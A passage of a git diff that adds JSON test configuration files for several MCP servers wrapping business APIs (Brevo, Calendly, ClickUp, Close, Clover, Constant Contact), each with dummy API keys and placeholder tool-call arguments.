"webUrl": "https://example.com" + }, + "expect": "exists" + }, + "send_sms:empty-webUrl": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "test_value", + "tag": "test_value", + "webUrl": "" + }, + "expect": "exists" + }, + "list_templates": { + "args": { + "templateStatus": true, + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_templates:empty-sort": { + "args": { + "templateStatus": true, + "limit": 50, + "offset": 50, + "sort": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/brevo.json b/factory-tools/test-configs/brevo.json new file mode 100644 index 0000000..ab3f9e8 --- /dev/null +++ b/factory-tools/test-configs/brevo.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/brevo/dist/index.js" + ], + "env": { + "BREVO_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/calendly-tests.json b/factory-tools/test-configs/calendly-tests.json new file mode 100644 index 0000000..460cea7 --- /dev/null +++ b/factory-tools/test-configs/calendly-tests.json @@ -0,0 +1,143 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/calendly/dist/index.js" + ], + "env": { + "CALENDLY_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_events": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "test_value", + "status": "active", + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_events:empty-min_start_time": { + "args": { + "count": 50, + "min_start_time": "", + "max_start_time": "test_value", + "status": "active", + 
"page_token": "test_value" + }, + "expect": "exists" + }, + "list_events:empty-max_start_time": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "", + "status": "active", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_events:empty-status": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "test_value", + "status": "", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_events:empty-page_token": { + "args": { + "count": 50, + "min_start_time": "test_value", + "max_start_time": "test_value", + "status": "active", + "page_token": "" + }, + "expect": "exists" + }, + "get_event": { + "args": { + "event_uuid": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "cancel_event": { + "args": { + "event_uuid": "test-id-123", + "reason": "test_value" + }, + "expect": "content && content.length > 0" + }, + "cancel_event:empty-reason": { + "args": { + "event_uuid": "test-id-123", + "reason": "" + }, + "expect": "exists" + }, + "list_event_types": { + "args": { + "count": 50, + "active": true, + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_event_types:empty-page_token": { + "args": { + "count": 50, + "active": true, + "page_token": "" + }, + "expect": "exists" + }, + "get_availability": { + "args": { + "event_type_uuid": "test-id-123", + "start_time": "test_value", + "end_time": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invitees": { + "args": { + "event_uuid": "test-id-123", + "count": 50, + "status": "active", + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invitees:empty-status": { + "args": { + "event_uuid": "test-id-123", + "count": 50, + "status": "", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_invitees:empty-page_token": { + "args": { + "event_uuid": "test-id-123", + "count": 50, + "status": "active", + 
"page_token": "" + }, + "expect": "exists" + }, + "get_user": { + "args": {}, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/calendly.json b/factory-tools/test-configs/calendly.json new file mode 100644 index 0000000..eca4b20 --- /dev/null +++ b/factory-tools/test-configs/calendly.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/calendly/dist/index.js" + ], + "env": { + "CALENDLY_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clickup-tests.json b/factory-tools/test-configs/clickup-tests.json new file mode 100644 index 0000000..764c5d8 --- /dev/null +++ b/factory-tools/test-configs/clickup-tests.json @@ -0,0 +1,300 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clickup/dist/index.js" + ], + "env": { + "CLICKUP_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_spaces": { + "args": { + "team_id": "test-id-123", + "archived": true + }, + "expect": "content && content.length > 0" + }, + "list_lists": { + "args": { + "folder_id": "test-id-123", + "space_id": "test-id-123", + "archived": true + }, + "expect": "content && content.length > 0" + }, + "list_lists:empty-folder_id": { + "args": { + "folder_id": "", + "space_id": "test-id-123", + "archived": true + }, + "expect": "exists" + }, + "list_lists:empty-space_id": { + "args": { + "folder_id": "test-id-123", + "space_id": "", + "archived": true + }, + "expect": "exists" + }, + "list_tasks": { + "args": { + "list_id": "test-id-123", + "archived": true, + "page": 50, + "order_by": "id", + "reverse": true, + "subtasks": true, + "include_closed": true, + "statuses": [], + "assignees": [] + }, + "expect": "content && content.length > 0" + 
}, + "list_tasks:empty-order_by": { + "args": { + "list_id": "test-id-123", + "archived": true, + "page": 50, + "order_by": "", + "reverse": true, + "subtasks": true, + "include_closed": true, + "statuses": [], + "assignees": [] + }, + "expect": "exists" + }, + "get_task": { + "args": { + "task_id": "test-id-123", + "include_subtasks": true + }, + "expect": "content && content.length > 0" + }, + "create_task": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "assignees": [], + "tags": [], + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-description": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "", + "assignees": [], + "tags": [], + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "test_value" + }, + "expect": "exists" + }, + "create_task:empty-status": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "assignees": [], + "tags": [], + "status": "", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "test_value" + }, + "expect": "exists" + }, + "create_task:empty-parent": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "assignees": [], + "tags": [], + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "" + }, + "expect": "exists" + }, + "update_task": { + "args": { + "task_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "content && content.length > 0" + }, + 
"update_task:empty-name": { + "args": { + "task_id": "test-id-123", + "name": "", + "description": "test_value", + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "exists" + }, + "update_task:empty-description": { + "args": { + "task_id": "test-id-123", + "name": "Test Name", + "description": "", + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "exists" + }, + "update_task:empty-status": { + "args": { + "task_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "status": "", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "exists" + }, + "add_comment": { + "args": { + "task_id": "test-id-123", + "comment_text": "Sample content for testing", + "assignee": "test_value", + "notify_all": true + }, + "expect": "content && content.length > 0" + }, + "add_comment:empty-assignee": { + "args": { + "task_id": "test-id-123", + "comment_text": "Sample content for testing", + "assignee": "", + "notify_all": true + }, + "expect": "exists" + }, + "get_time_entries": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "test-id-123", + "list_id": "test-id-123", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "content && content.length > 0" + }, + "get_time_entries:empty-assignee": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "", + "task_id": "test-id-123", + "list_id": "test-id-123", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" 
+ }, + "get_time_entries:empty-task_id": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "", + "list_id": "test-id-123", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + }, + "get_time_entries:empty-list_id": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "test-id-123", + "list_id": "", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + }, + "get_time_entries:empty-space_id": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "test-id-123", + "list_id": "test-id-123", + "space_id": "", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clickup.json b/factory-tools/test-configs/clickup.json new file mode 100644 index 0000000..e646140 --- /dev/null +++ b/factory-tools/test-configs/clickup.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clickup/dist/index.js" + ], + "env": { + "CLICKUP_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/close-tests.json b/factory-tools/test-configs/close-tests.json new file mode 100644 index 0000000..8c527ce --- /dev/null +++ b/factory-tools/test-configs/close-tests.json @@ -0,0 +1,554 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/close/dist/index.js" + ], + "env": { + "CLOSE_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_leads": { + "args": { + "query": "test 
query", + "_limit": 50, + "_skip": 50, + "_fields": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_leads:empty-query": { + "args": { + "query": "", + "_limit": 50, + "_skip": 50, + "_fields": "test_value" + }, + "expect": "exists" + }, + "list_leads:empty-_fields": { + "args": { + "query": "test query", + "_limit": 50, + "_skip": 50, + "_fields": "" + }, + "expect": "exists" + }, + "get_lead": { + "args": { + "lead_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_lead": { + "args": { + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "test-id-123", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "content && content.length > 0" + }, + "create_lead:empty-url": { + "args": { + "name": "Test Name", + "url": "", + "description": "test_value", + "status_id": "test-id-123", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "exists" + }, + "create_lead:empty-description": { + "args": { + "name": "Test Name", + "url": "https://example.com", + "description": "", + "status_id": "test-id-123", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "exists" + }, + "create_lead:empty-status_id": { + "args": { + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "exists" + }, + "update_lead": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "content && content.length > 0" + }, + "update_lead:empty-name": { + "args": { + "lead_id": "test-id-123", + "name": "", + "url": "https://example.com", + "description": "test_value", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "exists" + }, + "update_lead:empty-url": { + "args": { + "lead_id": 
"test-id-123", + "name": "Test Name", + "url": "", + "description": "test_value", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "exists" + }, + "update_lead:empty-description": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "https://example.com", + "description": "", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "exists" + }, + "update_lead:empty-status_id": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "", + "custom": {} + }, + "expect": "exists" + }, + "list_opportunities": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "user_id": "test-id-123", + "_limit": 50, + "_skip": 50 + }, + "expect": "content && content.length > 0" + }, + "list_opportunities:empty-lead_id": { + "args": { + "lead_id": "", + "status_id": "test-id-123", + "user_id": "test-id-123", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_opportunities:empty-status_id": { + "args": { + "lead_id": "test-id-123", + "status_id": "", + "user_id": "test-id-123", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_opportunities:empty-user_id": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "user_id": "", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "create_opportunity": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "test_value", + "date_won": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_opportunity:empty-status_id": { + "args": { + "lead_id": "test-id-123", + "status_id": "", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "test_value", + "date_won": "test_value" + }, + "expect": "exists" + }, + "create_opportunity:empty-value_period": { + "args": { + "lead_id": "test-id-123", + 
"status_id": "test-id-123", + "value": 50, + "value_period": "", + "confidence": 50, + "note": "test_value", + "date_won": "test_value" + }, + "expect": "exists" + }, + "create_opportunity:empty-note": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "", + "date_won": "test_value" + }, + "expect": "exists" + }, + "create_opportunity:empty-date_won": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "test_value", + "date_won": "" + }, + "expect": "exists" + }, + "create_activity": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_activity:empty-contact_id": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-user_id": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-note": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + 
"date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-subject": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-status": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-direction": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-date_created": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "" + }, + "expect": "exists" + }, + "list_tasks": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "is_complete": true, + "_type": "test_value", + "_limit": 50, + "_skip": 50 + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-lead_id": { + "args": { + "lead_id": "", + "assigned_to": "test_value", + "is_complete": true, + "_type": "test_value", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_tasks:empty-assigned_to": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "", + "is_complete": true, + "_type": 
"test_value", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_tasks:empty-_type": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "is_complete": true, + "_type": "", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "create_task": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "text": "Sample content for testing", + "date": "test_value", + "is_complete": true + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-assigned_to": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "", + "text": "Sample content for testing", + "date": "test_value", + "is_complete": true + }, + "expect": "exists" + }, + "create_task:empty-date": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "text": "Sample content for testing", + "date": "", + "is_complete": true + }, + "expect": "exists" + }, + "send_email": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "send_email:empty-contact_id": { + "args": { + "lead_id": "test-id-123", + "contact_id": "", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-body_text": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "", + "body_html": "test_value", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-body_html": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + 
"to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-status": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-template_id": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "test_value", + "template_id": "" + }, + "expect": "exists" + }, + "list_statuses": { + "args": { + "type": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_statuses:empty-type": { + "args": { + "type": "" + }, + "expect": "exists" + }, + "list_users": { + "args": {}, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/close.json b/factory-tools/test-configs/close.json new file mode 100644 index 0000000..3609e6c --- /dev/null +++ b/factory-tools/test-configs/close.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/close/dist/index.js" + ], + "env": { + "CLOSE_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clover-tests.json b/factory-tools/test-configs/clover-tests.json new file mode 100644 index 0000000..16db2c9 --- /dev/null +++ b/factory-tools/test-configs/clover-tests.json @@ -0,0 +1,217 @@ +{ + "server": { + "command": "node", + "args": [ + 
"/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clover/dist/index.js" + ], + "env": { + "CLOVER_API_KEY": "factory_discovery_dummy", + "CLOVER_MERCHANT_ID": "factory_discovery_dummy", + "CLOVER_REGION": "factory_discovery_dummy", + "CLOVER_SANDBOX": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_orders": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "order_id": "test-id-123", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_order:empty-expand": { + "args": { + "order_id": "test-id-123", + "expand": "" + }, + "expect": "exists" + }, + "create_order": { + "args": { + "state": "test_value", + "title": "test_value", + "note": "test_value", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "content && content.length > 0" + }, + "create_order:empty-state": { + "args": { + "state": "", + "title": "test_value", + "note": "test_value", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "exists" + }, + "create_order:empty-title": { + "args": { + "state": "test_value", + "title": "", + "note": "test_value", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "exists" + }, + "create_order:empty-note": { + "args": { + "state": "test_value", + "title": "test_value", + "note": "", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "exists" + }, + "create_order:empty-order_type_id": { + "args": { + "state": "test_value", + "title": "test_value", + "note": "test_value", + "order_type_id": "", + "line_items": [] + 
}, + "expect": "exists" + }, + "list_items": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_items:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "get_inventory": { + "args": { + "item_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "get_inventory:empty-item_id": { + "args": { + "item_id": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "list_payments": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_payments:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_payments:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "get_merchant": { + "args": { + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_merchant:empty-expand": { + "args": { + "expand": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clover.json 
b/factory-tools/test-configs/clover.json new file mode 100644 index 0000000..cf9929e --- /dev/null +++ b/factory-tools/test-configs/clover.json @@ -0,0 +1,14 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clover/dist/index.js" + ], + "env": { + "CLOVER_API_KEY": "factory_discovery_dummy", + "CLOVER_MERCHANT_ID": "factory_discovery_dummy", + "CLOVER_REGION": "factory_discovery_dummy", + "CLOVER_SANDBOX": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/constant-contact-tests.json b/factory-tools/test-configs/constant-contact-tests.json new file mode 100644 index 0000000..693c15b --- /dev/null +++ b/factory-tools/test-configs/constant-contact-tests.json @@ -0,0 +1,367 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/constant-contact/dist/index.js" + ], + "env": { + "CONSTANT_CONTACT_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_contacts": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-status": { + "args": { + "status": "", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-email": { + "args": { + "status": "all", + "email": "", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-lists": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "", + 
"segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-segment_id": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-include": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-cursor": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "" + }, + "expect": "exists" + }, + "add_contact": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "content && content.length > 0" + }, + "add_contact:empty-first_name": { + "args": { + "email_address": "test@example.com", + "first_name": "", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-last_name": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "", + "job_title": "test_value", + 
"company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-job_title": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-company_name": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-anniversary": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-create_source": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "" + }, + "expect": "exists" + }, + 
